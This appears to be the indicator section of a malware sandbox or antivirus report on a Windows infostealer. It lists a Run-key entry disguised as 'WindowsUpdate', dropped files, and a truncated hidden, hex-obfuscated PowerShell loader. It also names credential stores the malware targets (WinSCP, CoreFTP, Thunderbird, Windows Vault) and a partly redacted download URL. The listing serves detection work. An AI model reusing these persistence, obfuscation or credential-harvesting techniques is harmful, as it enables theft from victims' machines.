Technical Information
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'WindowsUpdate' = '%TEMP%\18643039\gtrkcrh.pif %TEMP%\18643039\miltjab.qwl'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function p4f34 {param($a5a186)$cd68d74='p3abd1';$m4aa3b='';for ($i=0; $i -lt $a5a186.length;$i+=2){$h9be9=[convert]::ToByte($a5a186.Substring($i,2),16);$m4aa3b+=[char]($h9...
- regsvcs.exe
- [<HKCU>\Software\RimArts\B2\Settings]
- [<HKCU>\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions]
- [<HKCU>\Software\FTPWare\COREFTP\Sites]
- %APPDATA%\thunderbird\profiles.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{598d1135-a2e8-4a72-a485-9d29907f53ea}.tmp
- %TEMP%\18643039\miltjab.qwl
- %TEMP%\18643039\gtrkcrh.pif
- %TEMP%\18643039\udau.log
- %TEMP%\18643039\ieoejtbu.ini
- %TEMP%\18643039\qftetvuktv.xls
- %TEMP%\18643039\umsta.exe
- %TEMP%\18643039\smckxkqmh.msc
- %TEMP%\18643039\ivkwg.xls
- %TEMP%\18643039\wgttaon.ppt
- %TEMP%\18643039\mnmcucntt.xl
- %TEMP%\18643039\vbuh.ini
- %APPDATA%\md3915f.exe
- %TEMP%\18643039\axpmejtw.ini
- %TEMP%\18643039\olcie.dll
- %TEMP%\18643039\cwtplcsqjj.dll
- %TEMP%\18643039\inmmmj.bmp
- %TEMP%\18643039\xhenksarqv.xl
- %TEMP%\18643039\cvpkfaltjj.jpg
- %TEMP%\18643039\ggoijuqmx.exe
- %TEMP%\18643039\djhp.dat
- %TEMP%\18643039\fvmpt.xml
- %HOMEPATH%\temp\axpmejtw.ini
- %TEMP%\regsvcs.exe
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %TEMP%\18643039\upgjpnnk.cpl
- %TEMP%\18643039\wfopdsqa.msc
- %TEMP%\pylronhc.dll
- %TEMP%\bucyspvb.dll
- %TEMP%\rescfa7.tmp
- %TEMP%\q8jpoo-m.cmdline
- %TEMP%\q8jpoo-m.out
- %TEMP%\fxojiahs.0.cs
- %TEMP%\fxojiahs.cmdline
- %TEMP%\fxojiahs.out
- %TEMP%\veerzbpz.0.cs
- %TEMP%\veerzbpz.cmdline
- %TEMP%\veerzbpz.out
- %TEMP%\pylronhc.0.cs
- %TEMP%\cscc9e9.tmp
- %TEMP%\cscca66.tmp
- %TEMP%\csccb12.tmp
- %TEMP%\q8jpoo-m.0.cs
- %TEMP%\bucyspvb.0.cs
- %TEMP%\bucyspvb.out
- %TEMP%\rescb23.tmp
- %TEMP%\pylronhc.cmdline
- %TEMP%\resc9fa.tmp
- %TEMP%\resca77.tmp
- %TEMP%\pylronhc.out
- %TEMP%\q8jpoo-m.dll
- %TEMP%\fxojiahs.dll
- %TEMP%\cscce6d.tmp
- %TEMP%\veerzbpz.dll
- %TEMP%\csccfa6.tmp
- %TEMP%\resce7e.tmp
- %TEMP%\bucyspvb.cmdline
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\18643039\gtrkcrh.pif
- %TEMP%\rescb23.tmp
- %TEMP%\veerzbpz.0.cs
- %TEMP%\veerzbpz.out
- %TEMP%\resce7e.tmp
- %TEMP%\cscce6d.tmp
- %TEMP%\bucyspvb.pdb
- %TEMP%\bucyspvb.0.cs
- %TEMP%\bucyspvb.dll
- %TEMP%\pylronhc.pdb
- %TEMP%\bucyspvb.out
- %TEMP%\rescfa7.tmp
- %TEMP%\csccfa6.tmp
- %TEMP%\pylronhc.cmdline
- %TEMP%\pylronhc.dll
- %TEMP%\pylronhc.0.cs
- %TEMP%\veerzbpz.pdb
- %TEMP%\bucyspvb.cmdline
- %TEMP%\veerzbpz.dll
- %TEMP%\q8jpoo-m.pdb
- %TEMP%\resc9fa.tmp
- %TEMP%\cscc9e9.tmp
- %TEMP%\resca77.tmp
- %TEMP%\cscca66.tmp
- %TEMP%\q8jpoo-m.dll
- %TEMP%\q8jpoo-m.cmdline
- %TEMP%\q8jpoo-m.out
- %TEMP%\fxojiahs.out
- %TEMP%\q8jpoo-m.0.cs
- %TEMP%\csccb12.tmp
- %TEMP%\fxojiahs.cmdline
- %TEMP%\fxojiahs.pdb
- %TEMP%\fxojiahs.dll
- %TEMP%\fxojiahs.0.cs
- %TEMP%\veerzbpz.cmdline
- %TEMP%\pylronhc.out
- http://sk###re.com.mx/wp-includes/pomo/nvx/siz.php
- http://sk###re.com.mx/excel.exe
- DNS ASK sk###re.com.mx
- ClassName: 'EDIT' WindowName: ''
- '%APPDATA%\md3915f.exe'
- '%TEMP%\18643039\gtrkcrh.pif' miltjab.qwl
- '%TEMP%\regsvcs.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function p4f34 {param($a5a186)$cd68d74='p3abd1';$m4aa3b='';for ($i=0; $i -lt $a5a186.length;$i+=2){$h9be9=[convert]::ToByte($a5a186.Substring($i,2),16);$m4aa3b+=[char]($h9...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\q8jpoo-m.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fxojiahs.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\veerzbpz.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC9FA.tmp" "%TEMP%\CSCC9E9.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCA77.tmp" "%TEMP%\CSCCA66.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCB23.tmp" "%TEMP%\CSCCB12.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bucyspvb.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pylronhc.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCE7E.tmp" "%TEMP%\CSCCE6D.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCFA7.tmp" "%TEMP%\CSCCFA6.tmp"' (with hidden window)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\q8jpoo-m.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\fxojiahs.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\veerzbpz.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC9FA.tmp" "%TEMP%\CSCC9E9.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCA77.tmp" "%TEMP%\CSCCA66.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCB23.tmp" "%TEMP%\CSCCB12.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\bucyspvb.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pylronhc.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCE7E.tmp" "%TEMP%\CSCCE6D.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCFA7.tmp" "%TEMP%\CSCCFA6.tmp"